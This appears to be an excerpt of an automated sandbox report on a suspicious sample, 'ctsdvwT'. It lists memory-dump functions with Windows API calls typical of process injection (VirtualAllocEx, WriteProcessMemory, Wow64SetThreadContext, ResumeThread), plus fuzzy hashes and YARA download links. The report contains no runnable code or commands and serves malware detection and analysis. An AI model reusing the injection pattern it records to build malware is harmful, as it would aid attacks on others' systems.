                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 01831CC8
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2249331157.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_1830000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: MemoryProcessWrite
                                        • String ID:
                                        • API String ID: 3559483778-0
                                        • Opcode ID: 78fb602252351ab42a289bf71485424977be529b3b01fa875e1d82eefd358975
                                        • Instruction ID: 2a146576acf615de9081bfa62e6d566c80b6ba6bd643ee5e40625b55285876b7
                                        • Opcode Fuzzy Hash: 78fb602252351ab42a289bf71485424977be529b3b01fa875e1d82eefd358975
                                        • Instruction Fuzzy Hash: E32139B19003099FDB10DFAAC985BEEBBF5FF48310F148429E919A7240D7789945CBA0
                                        Function 014DD678 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                        Download Yara Rule
                                        APIs
                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 014DD707
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2248003028.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_14d0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: DuplicateHandle
                                        • String ID:
                                        • API String ID: 3793708945-0
                                        • Opcode ID: 461f932398def541c6387c56e61fb84315d9d07da9455829d2e6fc6d74d9ad5f
                                        • Instruction ID: ecc95eb7c03d73202be9afd017041c628f951ac7addf7694171b70fc49525b73
                                        • Opcode Fuzzy Hash: 461f932398def541c6387c56e61fb84315d9d07da9455829d2e6fc6d74d9ad5f
                                        • Instruction Fuzzy Hash: 7A21E5B5D00248AFDB10CF9AD584ADEBFF5EB48310F14845AE958A7350D378A940CFA5
                                        Function 01831D21 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                        Download Yara Rule
                                        APIs
                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 01831DA8
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2249331157.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_1830000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: MemoryProcessRead
                                        • String ID:
                                        • API String ID: 1726664587-0
                                        • Opcode ID: 9c9fabb81c0fb7ceca4fc0b49acc3f8b815288f2e50d14b50934b3d697ee29de
                                        • Instruction ID: 8634c2f522d78bd0c696bff61278041a7e80b8c8eb7e5efde3ada0b5a71a063e
                                        • Opcode Fuzzy Hash: 9c9fabb81c0fb7ceca4fc0b49acc3f8b815288f2e50d14b50934b3d697ee29de
                                        • Instruction Fuzzy Hash: 332159B1C003499FCB10DFAAC884AEEFBF5FF88310F108429E959A7240C7389945CBA0
                                        Function 01831660 Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 018316E6
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2249331157.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_1830000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: ContextThreadWow64
                                        • String ID:
                                        • API String ID: 983334009-0
                                        • Opcode ID: 574f1fad32f2f117143205a40d7d5a41b1b253994bf213c62194945e6738839a
                                        • Instruction ID: f76b838cb21ae91b71c5e92e3af2b9f4c1880d13fda57e97f3e8b244485c4d08
                                        • Opcode Fuzzy Hash: 574f1fad32f2f117143205a40d7d5a41b1b253994bf213c62194945e6738839a
                                        • Instruction Fuzzy Hash: 7A2138B1D003098FDB14DFAAC485BEEBBF5EF88314F148429D559A7240DB78AA45CFA4
                                        Function 018315B0 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2249331157.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_1830000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: ResumeThread
                                        • String ID:
                                        • API String ID: 947044025-0
                                        • Opcode ID: 4af4cb9f355ee5bf51555be7bad26ddf9c2c1a01b1e9bcebf3541fcf4b79883f
                                        • Instruction ID: c4059b745deb135957ad1e3ac22088cd3d105b1367f43d096485bc5be40bac39
                                        • Opcode Fuzzy Hash: 4af4cb9f355ee5bf51555be7bad26ddf9c2c1a01b1e9bcebf3541fcf4b79883f
                                        • Instruction Fuzzy Hash: 57219AB5C002488FCB20DFA9D4486EEFBF4EF89310F24885AD519A7200D7399945CFA1
                                        Function 01831D28 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                        Download Yara Rule
                                        APIs
                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 01831DA8
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2249331157.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_1830000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: MemoryProcessRead
                                        • String ID:
                                        • API String ID: 1726664587-0
                                        • Opcode ID: a6999f092503feda317d3384430ab6fce48245fc14cca79dbc1c2c0a1020bb84
                                        • Instruction ID: c3c9439785f689f0ee018804ede2c0963e3994677a2cb4313e7f9d17746ac8d4
                                        • Opcode Fuzzy Hash: a6999f092503feda317d3384430ab6fce48245fc14cca79dbc1c2c0a1020bb84
                                        • Instruction Fuzzy Hash: CC213AB1D003499FCB10DFAAC844AEEFBF5FF48310F108429E519A7240C7389545CBA0
                                        Function 01831668 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 018316E6
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2249331157.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_1830000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: ContextThreadWow64
                                        • String ID:
                                        • API String ID: 983334009-0
                                        • Opcode ID: d40ceb6e77d910c0b01620623bf14368be05b556216b73d8f465551fa406dba6
                                        • Instruction ID: d06a97fb77c8974806a460e35786fe4950745bad0bf3ceb4ea41610739672e80
                                        • Opcode Fuzzy Hash: d40ceb6e77d910c0b01620623bf14368be05b556216b73d8f465551fa406dba6
                                        • Instruction Fuzzy Hash: A92138B1D003098FDB10DFAAC485BEEBBF4EF88310F148429D519A7240DB789945CFA4
                                        Function 014DD680 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                        Download Yara Rule
                                        APIs
                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 014DD707
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2248003028.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_14d0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: DuplicateHandle
                                        • String ID:
                                        • API String ID: 3793708945-0
                                        • Opcode ID: e8031eec2e8b0aa1a0f50fa11a2ea635c4b7547f18995dd7b6711f2425116f0e
                                        • Instruction ID: 8ba3ae79c99d97558ea7bfab2b1bfb3e20999bd17e3d79413d490acbf924618f
                                        • Opcode Fuzzy Hash: e8031eec2e8b0aa1a0f50fa11a2ea635c4b7547f18995dd7b6711f2425116f0e
                                        • Instruction Fuzzy Hash: FC21C4B5D002489FDB10CF9AD584ADEBFF9FB48310F14845AE918A3350D378A944CFA5
                                        Function 014DA168 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,014DB079,00000800,00000000,00000000), ref: 014DB28A
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2248003028.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_14d0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: LibraryLoad
                                        • String ID:
                                        • API String ID: 1029625771-0
                                        • Opcode ID: 19bfd5026b8538b59ba4c28c51cb8311811f660970b7ea7c52d576bfa373220f
                                        • Instruction ID: 09d25dde40644bd9e066ab686d0b615e3e3213242e2af793d9ca08e394b1f9d5
                                        • Opcode Fuzzy Hash: 19bfd5026b8538b59ba4c28c51cb8311811f660970b7ea7c52d576bfa373220f
                                        • Instruction Fuzzy Hash: E51114B68003089FDB10CF9AD448ADEFBF4EB49310F11842EE519A7210C379A545CFA4
                                        Function 01831B70 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 01831BE6
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2249331157.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_1830000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID:
                                        • API String ID: 4275171209-0
                                        • Opcode ID: 32c834019123e47b245c7a98d3f4c1bec95d151f32e2e627cab4fe3958593117
                                        • Instruction ID: 4f5542905d673441fc02875a57e5126418c85ea0806f15538043c849a7fc1110
                                        • Opcode Fuzzy Hash: 32c834019123e47b245c7a98d3f4c1bec95d151f32e2e627cab4fe3958593117
                                        • Instruction Fuzzy Hash: 0D116A768003499FCB14DFAAC844AEEBFF5FF88324F148419E559A7250C735A944CFA0
                                        Function 014DB219 Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,014DB079,00000800,00000000,00000000), ref: 014DB28A
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2248003028.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_14d0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: LibraryLoad
                                        • String ID:
                                        • API String ID: 1029625771-0
                                        • Opcode ID: 9b593cc9281b2a239964be410ff196a108679b98447d40060d5a59d680a6c5e1
                                        • Instruction ID: 6e321928f4c6f5890166a325d1635e69866e22ae971b8f244bc46bd2bdf92d00
                                        • Opcode Fuzzy Hash: 9b593cc9281b2a239964be410ff196a108679b98447d40060d5a59d680a6c5e1
                                        • Instruction Fuzzy Hash: D41112B69002498FDB14CFAAD448ADEFBF4EB49710F10842EE559A7310C379A545CFA4
                                        Function 01831B78 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 01831BE6
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2249331157.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_1830000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID:
                                        • API String ID: 4275171209-0
                                        • Opcode ID: 0caa4d4102bb59cb5e47b5914307a59f1e8e018973f07849ada8f54dc6e8005e
                                        • Instruction ID: 8bb14a08f16fd391feb100f3a3175daa541c6ea26191c86465feef3472934998
                                        • Opcode Fuzzy Hash: 0caa4d4102bb59cb5e47b5914307a59f1e8e018973f07849ada8f54dc6e8005e
                                        • Instruction Fuzzy Hash: 161137758002499FCB14DFAAC844AEEBFF5EF88310F148419E519A7250CB79A544CFA0
                                        Function 018315B8 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2249331157.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_1830000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: ResumeThread
                                        • String ID:
                                        • API String ID: 947044025-0
                                        • Opcode ID: 37ed81cfbce0c6592f26254c7561fff23a5644349445e235d38c6ea53005865f
                                        • Instruction ID: 6ea5c9d9e39bed8f7b8e67161c6f5ac08fa0d2e5ea4523ce844d5d438101bb4a
                                        • Opcode Fuzzy Hash: 37ed81cfbce0c6592f26254c7561fff23a5644349445e235d38c6ea53005865f
                                        • Instruction Fuzzy Hash: FD113AB1D003488FDB24DFAAC4497EEFBF5EF88714F248819D519A7240DB79A544CBA4
                                        Function 01837DC9 Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                        Download Yara Rule
                                        APIs
                                        • FindCloseChangeNotification.KERNELBASE(?), ref: 01837E28
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2249331157.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_1830000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: ChangeCloseFindNotification
                                        • String ID:
                                        • API String ID: 2591292051-0
                                        • Opcode ID: d12638946c6d1e6f2a8cf4993a84f62eb90d6d55170f172be6ba1ff6a6dc1b27
                                        • Instruction ID: b8ffb170827cf48612628664280e6d994979c6b072d8368376b1081356b54340
                                        • Opcode Fuzzy Hash: d12638946c6d1e6f2a8cf4993a84f62eb90d6d55170f172be6ba1ff6a6dc1b27
                                        • Instruction Fuzzy Hash: FC11F5B68007498FDB20DF99D544BEEBBF5EB88320F14841AD958A7240D339AA45CFA5
                                        Function 014DAF98 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 014DAFFE
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2248003028.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_14d0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: HandleModule
                                        • String ID:
                                        • API String ID: 4139908857-0
                                        • Opcode ID: 31e9bbe2b8bdef3852078426a05a43ce3dd8ca0c1f128342456798f98c1b2566
                                        • Instruction ID: 12071591aaa1eee9798224da8deed144e470faf34a9f65e5b802a946a02fe68d
                                        • Opcode Fuzzy Hash: 31e9bbe2b8bdef3852078426a05a43ce3dd8ca0c1f128342456798f98c1b2566
                                        • Instruction Fuzzy Hash: 17110FB6C002498FDB24CF9AC444ADEFBF4EB88214F10845AD528A7210D379A545CFA1
                                        Function 01833044 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 018351FD
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2249331157.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_1830000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: MessagePost
                                        • String ID:
                                        • API String ID: 410705778-0
                                        • Opcode ID: 7d7cb196519673e60764b4084bdbf2985198649a4cd37b3944e1ab6d71ce6bca
                                        • Instruction ID: 9def21d9e74ee709175f18d9d89bce1550ef2ea010a99cf3ce5d6c64ed5faea9
                                        • Opcode Fuzzy Hash: 7d7cb196519673e60764b4084bdbf2985198649a4cd37b3944e1ab6d71ce6bca
                                        • Instruction Fuzzy Hash: 0011F2B58003489FDB20DF9AD848BDEBBF8FB48310F148419E918A7200C379AA44CFE5
                                        Function 01837DD0 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                        Download Yara Rule
                                        APIs
                                        • FindCloseChangeNotification.KERNELBASE(?), ref: 01837E28
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2249331157.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_1830000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: ChangeCloseFindNotification
                                        • String ID:
                                        • API String ID: 2591292051-0
                                        • Opcode ID: 2309bbc32a9a65ab2d8c30407b8de8d7f4438462fdf211d4a4a41a3cf846a91a
                                        • Instruction ID: f907b476e0ef2e614480f989ffef7e144f9388a0136f7049cb13af103bfe1549
                                        • Opcode Fuzzy Hash: 2309bbc32a9a65ab2d8c30407b8de8d7f4438462fdf211d4a4a41a3cf846a91a
                                        • Instruction Fuzzy Hash: 171106B58003498FDB10DF9AD545BDEBBF4EB48320F148419D558A7240D738A944CFA5
                                        Function 01835198 Relevance: 1.5, APIs: 1, Instructions: 45windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 018351FD
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2249331157.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_1830000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: MessagePost
                                        • String ID:
                                        • API String ID: 410705778-0
                                        • Opcode ID: 30d2306da5636fdfde75747cc8d6178b7f0c9e1f1bc85f2bd2c69ffc63e17b9b
                                        • Instruction ID: 1f4f3a22d0ea1dbaf2f9ab3a5302f546cade5af27b6463b546fed984084dc805
                                        • Opcode Fuzzy Hash: 30d2306da5636fdfde75747cc8d6178b7f0c9e1f1bc85f2bd2c69ffc63e17b9b
                                        • Instruction Fuzzy Hash: DD11D2B58003499FDB20DF99D448BEEBBF4EB58310F14841AE559A7201C379A544CFA1
                                        Function 07F73528 Relevance: 1.5, Strings: 1, Instructions: 235COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Haq
                                        • API String ID: 0-725504367
                                        • Opcode ID: 2a16ae56f9d0d42521a65d599422fc61872694693118993c621c14254276025d
                                        • Instruction ID: 0383ba5a68da0acb52635378bc46ab5b8ddf4cf1ebc745510bb2428f0f4da3b7
                                        • Opcode Fuzzy Hash: 2a16ae56f9d0d42521a65d599422fc61872694693118993c621c14254276025d
                                        • Instruction Fuzzy Hash: AE915175A002599FCB04DFA9C4909EEBBF5FF89300B14846AE804EB365E735DD16CB91
                                        Function 07F7CC78 Relevance: 1.4, Strings: 1, Instructions: 169COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: r
                                        • API String ID: 0-1812594589
                                        • Opcode ID: 5c6d7af0617946eb86f8864cd9647b9f3776f97bbfac5a6528513aedc0f3aa38
                                        • Instruction ID: 0d699bcc24e56ee3ef30a50cb1cfcfaf2866e28ea4091f8d6f88a767cfdf14f9
                                        • Opcode Fuzzy Hash: 5c6d7af0617946eb86f8864cd9647b9f3776f97bbfac5a6528513aedc0f3aa38
                                        • Instruction Fuzzy Hash: 0E61D5B5D19209DBCB04CFA9C0849EDBBBEBB4E301F58D166E829AA251C730D941CF61
                                        Function 07F73B04 Relevance: 1.4, Strings: 1, Instructions: 152COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Te]q
                                        • API String ID: 0-52440209
                                        • Opcode ID: ba947a196e88ca8baaaf4a9d3aba36ab65c5ddca0b9cf38902db7a5813b89f23
                                        • Instruction ID: b6cebafa98af8f05ebaac6e2ab9ab312e320ce0d58c4247e36bf98a3577324fb
                                        • Opcode Fuzzy Hash: ba947a196e88ca8baaaf4a9d3aba36ab65c5ddca0b9cf38902db7a5813b89f23
                                        • Instruction Fuzzy Hash: 4A51AF71B0061A8FCB15DF7998449AEBBF6EFC8320B18892AE459DB350EF309D05C791
                                        Function 07F7323A Relevance: 1.3, Strings: 1, Instructions: 76COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4']q
                                        • API String ID: 0-1259897404
                                        • Opcode ID: 58213da441366ff60731a4fc12b806488568d0d83c1a6c648268abec649e788f
                                        • Instruction ID: 4a5dfa287b1110dde3a8ccfbad29b39827ea8b8f39617e3f7cbaf49552c80bda
                                        • Opcode Fuzzy Hash: 58213da441366ff60731a4fc12b806488568d0d83c1a6c648268abec649e788f
                                        • Instruction Fuzzy Hash: 04217F357103259BD714DB69D850BAFB7FAFFC8B10F10852AE5089B3A1DAB59C428391
                                        Function 07F7B328 Relevance: 1.3, Strings: 1, Instructions: 61COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Te]q
                                        • API String ID: 0-52440209
                                        • Opcode ID: 01f60dbf855aabf562696d661764f9dc67a75620ddf580bd3e37cc3d598d5e4e
                                        • Instruction ID: 193dcec7ae620f27b09d00cd6e733d7c6716c5046fb28189734780555512a2be
                                        • Opcode Fuzzy Hash: 01f60dbf855aabf562696d661764f9dc67a75620ddf580bd3e37cc3d598d5e4e
                                        • Instruction Fuzzy Hash: 3F21F7B0D1424C8BDB08DFEAC4556AEBFFABF99300F54802AD419AB358DB705846CB90
                                        Function 07F76908 Relevance: 1.3, Strings: 1, Instructions: 58COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Te]q
                                        • API String ID: 0-52440209
                                        • Opcode ID: 36bdd3d9b86e648718135a2ea5ba51915a82c170886e09a24677fd96f39ea926
                                        • Instruction ID: 33ea5b1ef2fb0dad022923b09ca7bd535a357fe7d6f6dd1b16fb00752258e9fc
                                        • Opcode Fuzzy Hash: 36bdd3d9b86e648718135a2ea5ba51915a82c170886e09a24677fd96f39ea926
                                        • Instruction Fuzzy Hash: DF115E71F0060A8BCB04EFB999115FEB7F6EFC8610B1440AAC509E7340EB368D02CBA1
                                        Function 07F7279F Relevance: .3, Instructions: 291COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8f3b30560163bc6b6c1ad550d2aa021e1224d2c7ce67952c324b01fc95d534fc
                                        • Instruction ID: 03289b73e330ad4e9bb33b7433b533695421b94e3e9b5b1526f9522a8854e9ea
                                        • Opcode Fuzzy Hash: 8f3b30560163bc6b6c1ad550d2aa021e1224d2c7ce67952c324b01fc95d534fc
                                        • Instruction Fuzzy Hash: A3B18D75600701CFC305EF38D594A9ABBF6FF89300F18896ED45A8B365DB30A946CB91
                                        Function 07F729B6 Relevance: .3, Instructions: 280COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1df32349431b79911b3edcb59ccd7d80140eacb9af20ff5c0484f020819b9de9
                                        • Instruction ID: 58682c5cb80301226cf8d6722fd0a9045a73ef7a1d6df37c847a1a30ec243763
                                        • Opcode Fuzzy Hash: 1df32349431b79911b3edcb59ccd7d80140eacb9af20ff5c0484f020819b9de9
                                        • Instruction Fuzzy Hash: 99B16A75A00701CFC309EF28D994A9ABBF6FF89300B5484AED45A9B375DB30E945CB91
                                        Function 07F727EB Relevance: .3, Instructions: 279COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7d53fbe36178fe5a4bcb1e35fe9055145be27dfdd396a381a6446fff7ddcff90
                                        • Instruction ID: 51a334b757e99dd7ff40fe2d832d9834a08d9c6aecea512e8b088dd07073b007
                                        • Opcode Fuzzy Hash: 7d53fbe36178fe5a4bcb1e35fe9055145be27dfdd396a381a6446fff7ddcff90
                                        • Instruction Fuzzy Hash: 06B19C74610701CFC309EF28C884A9ABBF6FF89300F1485AED45A8B365DB30E946CB91
                                        Function 07F72D20 Relevance: .3, Instructions: 274COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 415744f5a44bb571dfffd76a5ef4fdf1ab5477e69d695e17c20d533f6394c8cb
                                        • Instruction ID: ecbfaa9f3b702e4e3e661946726afbe328f9a16034721f5d677619dece1b0854
                                        • Opcode Fuzzy Hash: 415744f5a44bb571dfffd76a5ef4fdf1ab5477e69d695e17c20d533f6394c8cb
                                        • Instruction Fuzzy Hash: FCB15875600701CFC305EF28D994A9ABBF6FF89300B5884AED45A8B375EB31E945CB91
                                        Function 07F72B71 Relevance: .3, Instructions: 270COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6a273e82b4df21c1a811f9d192abb977d219a54200334824232c2970722ef626
                                        • Instruction ID: 8f74006a4af489a3e7c00365782be2effe7b8c3ee3394ff1a313363e205bfd34
                                        • Opcode Fuzzy Hash: 6a273e82b4df21c1a811f9d192abb977d219a54200334824232c2970722ef626
                                        • Instruction Fuzzy Hash: 6AB16975600701CFC305EF28D994A9ABBF6FF89300B5485AED45A8B365EB30A946CB91
                                        Function 07F72B11 Relevance: .3, Instructions: 266COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 13fc1a9622f9b9da984b65d58657f913b3050cd9df78747096b8edc15c3eac0c
                                        • Instruction ID: 6255d2ec7737283784d60c64ec38784246c05e88ef5861d4a3a3c28d75ce5708
                                        • Opcode Fuzzy Hash: 13fc1a9622f9b9da984b65d58657f913b3050cd9df78747096b8edc15c3eac0c
                                        • Instruction Fuzzy Hash: 9EB18C746007018FC309EF28D494A9ABBF6FF89300F5489AED45A9B365DF30A946CB91
                                        Function 07F72A38 Relevance: .3, Instructions: 264COMMON
                                        Download Yara Rule
